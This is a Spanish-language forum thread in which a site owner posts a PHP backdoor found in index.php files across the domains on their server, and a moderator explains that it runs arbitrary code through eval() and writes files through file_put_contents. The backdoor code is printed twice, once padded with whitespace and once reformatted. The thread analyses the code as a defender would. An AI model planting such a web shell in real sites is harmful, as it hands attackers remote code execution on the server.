elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  ¿Código maliciosos?... Lo encontré en mi SERVER "/		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Código maliciosos?... Lo encontré en mi SERVER "/  (Leído 2,007 veces)
NetStorm

Desconectado Desconectado

Mensajes: 114


Ver Perfil
¿Código maliciosos?... Lo encontré en mi SERVER "/
« en: 13 Diciembre 2012, 16:15 pm »
Hola muchachos, en esta ocasión les comparto el código que encontré hoy en la mañana en mi server de godaddy.

Código:
<?php       
                                                                                                                                                                                                                                                                                                                                                                 						if(isset($_REQUEST['gnobkr_galuh'])) { $hklp_mrzpfa = $_REQUEST['gnobkr_galuh']; eval($hklp_mrzpfa); } if(isset($_REQUEST['wzv_ttbhhc'])) { $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp']; $fjy_qgk = $_REQUEST['wzv_ttbhhc']; file_put_contents($fjy_qgk, $ytyye_fpbqa); }

?>

El contenido estaba dentro de un archivo Index.php, que se había creado en todos los dominios de mi server, tengo varios dominios alojados, cuando cargaba cualquiera de esos dominios se mostraba en blanco, obviamente porque no enviaba las variables que requiere este script. Yo soy programador en php intermedio, pero con este código me basta para hacer desmadres en el servidor. 

¿Sus opiniones? :huh:
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
« Respuesta #1 en: 13 Diciembre 2012, 17:17 pm »
Código
  1.  <?php
  2. if (isset($_REQUEST['gnobkr_galuh'])) {
  3.     $hklp_mrzpfa = $_REQUEST['gnobkr_galuh'];
  4.     eval($hklp_mrzpfa);
  5. }
  6. if (isset($_REQUEST['wzv_ttbhhc'])) {
  7.     $ytyye_fpbqa = $_REQUEST['pmhoc_pkkp'];
  8.     $fjy_qgk     = $_REQUEST['wzv_ttbhhc'];
  9.     file_put_contents($fjy_qgk, $ytyye_fpbqa);
  10. }

Quizás ya que ejecuta la función eval(), es muy peligroso porque permite la ejecución de código de PHP arbitrario.
Hasta puede subir un archivo al servidor, quizás webshell con la función file_put_contents()
« Última modificación: 13 Diciembre 2012, 17:20 pm por Shell Root » En línea
Te vendería mi talento por poder dormir tranquilo.
NetStorm

Desconectado Desconectado

Mensajes: 114


Ver Perfil
Re: ¿Código maliciosos?... Lo encontré en mi SERVER "/
« Respuesta #2 en: 30 Diciembre 2012, 01:02 am »
Queda claro que al recibir variables con esos nombres que solo el atacante podría conocer, además de ejecutar código arbitrario con "eval" ES MALICIOSO.

TEMA CERRADO!

Gracias
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Error al instalar "sql server standard edition 2005"
Bases de Datos 		Xedrox 3 4,821 Último mensaje 13 Diciembre 2010, 17:43 pm
por Novlucker
Error al instalar "sql server standard edition 2005"
Bases de Datos 		Xedrox 2 3,959 Último mensaje 13 Marzo 2011, 23:23 pm
por Xedrox
me encontre un chip movistar pero me pedia codigo punk y los gaste todo
Dispositivos Móviles (PDA's, Smartphones, Tablets) 		mrt_15 2 6,122 Último mensaje 22 Junio 2011, 21:23 pm
por mrt_15
Blackberry Enterprise Server es vulnerable a archivos TIFF maliciosos
Noticias 		wolfbcn 0 1,424 Último mensaje 18 Febrero 2013, 22:15 pm
por wolfbcn
Ayuda encontre en mi sitio web una imagen gif con el siguiente codigo php
Seguridad 		priester007 1 2,812 Último mensaje 29 Noviembre 2013, 16:46 pm
por MasterAndHack
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines